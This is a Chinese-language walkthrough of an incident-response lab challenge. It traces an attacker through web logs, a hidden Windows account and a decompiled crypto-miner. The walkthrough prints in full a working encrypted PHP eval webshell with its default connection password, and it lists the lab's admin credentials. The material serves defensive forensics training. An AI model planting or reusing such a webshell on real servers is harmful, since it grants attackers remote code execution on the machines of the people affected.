环境搭建#
项目地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/15/
相关账户密码#
用户:administrator
密码:Zgsf@admin.com
前景需要:#
小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,并找来正在吃苕皮的hxd帮他分析,这是他的服务器系统,请你找出以下内容,并作为通关条件:
1.攻击者的shell密码
2.攻击者的IP地址
3.攻击者的隐藏账户名称
4.攻击者挖矿程序的矿池域名(仅域名)
5.有实力的可以尝试着修复漏洞
1.攻击者的shell密码#
找到日志文件进行分析:
分析日志:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| ──(xvsf?kali)-[~/tmp]
└─$ ls
access.log.1708905600
┌──(xvsf?kali)-[~/tmp]
└─$ awk '{print $1,$7}' access.log.1708905600 | sort | uniq -c | grep -v '::1' | grep '.php'
5740 192.168.126.1 /admin/account.php?action=dosignin&s=
1 192.168.126.1 /admin/account.php?action=signin
6 192.168.126.1 /admin/account.php?action=signin&err_login=1
2 192.168.126.1 /admin/plugin.php
3 192.168.126.1 /admin/plugin.php?action=active&plugin=tips/tips.php&token=2dac908ae2df3b0237dee7081da123d213176d24
11 192.168.126.1 /admin/plugin.php?action=check_update
2 192.168.126.1 /admin/plugin.php?action=del&plugin=tips/tips.php&token=2dac908ae2df3b0237dee7081da123d213176d24
1 192.168.126.1 /admin/plugin.php?action=inactive&plugin=tips/tips.php&token=2dac908ae2df3b0237dee7081da123d213176d24
3 192.168.126.1 /admin/plugin.php?action=upload_zip
2 192.168.126.1 /admin/plugin.php?activate_del=1
2 192.168.126.1 /admin/plugin.php?activate_install=1
3 192.168.126.1 /admin/plugin.php?active=1
1 192.168.126.1 /admin/plugin.php?error_e=1
1 192.168.126.1 /admin/plugin.php?inactive=1
2 192.168.126.1 /admin/upgrade.php?action=check_update
142791 192.168.126.1 /content/plugins/tips/shell.php
1 192.168.126.1 /content/plugins/tips/shell.php?888666=331
1 192.168.126.1 /content/plugins/tips/shell.php?888666=395
1 192.168.126.1 /content/plugins/tips/shell.php?888666=619
1 192.168.126.1 /content/plugins/tips/shell.php?AMKhtlTTEMKCZN5T=VbN2ItDmt0cZsJ8nFYFjPG8JpJHhNyqg&NQxMQd88ByKdwKQF=5vlwUtyYSChArIsZ3ajO6Jxzx7vRJuHl&888666=XSXMdgEcy5mYZOn9L4RoWLbwYo9nTxgr&htdk7suOo2SdXKmV=10I1HotZgl6Y50OMPTZRfKOMV1oVbQky&pp4TqWAlQHyYQdb1=rFVrQrbQT3VMlwPZxrnKVOekDCUcVeiX
1 192.168.126.1 /content/plugins/tips/shell.php?nzQbavYgN6ODoxF1=G65ASv8y3UvkREqS1BhtN8ZQ9rBOTuYm&YD2ZXadPSvHEOYc2=Mtp8qcxNdDLrUSDD7WH6NZB9LGuhPYLT&888666=7Sn1K3PXNdf2Fh0LymWfQDymalxp4ty1&Y0fAQLYotO6P9ZRM=dj3DhH6k3adKnymgE07L8YUSXjdkX4vx&pV8lXaCzdJhmssdK=V4VdNXaxzvxXLdkEB9DTv7Bqbg3qw92J
┌──(xvsf?kali)-[~/tmp]
└─$ awk '{print $1}' access.log.1708905600 | sort | uniq -c
75 ::1
148632 192.168.126.1
┌──(xvsf?kali)-[~/tmp]
└─$
|
得到攻击者 IP:192.168.126.1
并且上传了 shell 在:/content/plugins/tips/shell.php
shell.php:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| <?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
|
shell 密码:rebeyond
2.攻击者的IP地址#
通过日志分析得知:**192.168.126.1**
3.攻击者的隐藏账户名称#
分析隐藏账户
Get-LocalUser
很明显,隐藏账户名称就是:hack168$
4.攻击者挖矿程序的矿池域名(仅域名)#
挖矿程序会占用系统资源很高,但是在资源管理器并没有找到异常
然后进入到攻击者注册的账户:
在这个用户的桌面发现了一个特殊的文件:
字符串中出现了 zETH、eTh、BTC 等,这进一步坐实了它与以太坊或比特币相关的挖矿行为。
对这个程序尝试解包、反编译:
解包:
1
2
3
| wget https://raw.githubusercontent.com/extremecoders-re/pyinstxtractor/master/pyinstxtractor.py
python3 pyinstxtractor.py Kuang.exe
|
反编译 :
1
2
3
4
| git clone https://github.com/zrax/pycdc.git
cd pycdc && cmake . && make
# 编译完成后,使用它反编译提取出的主文件
./pycdc ../Kuang.exe_extracted/Kuang.pyc
|
域名就是:wakuang.zhigongshanfang.top
最后一个正确的话,解题程序就自动关闭了
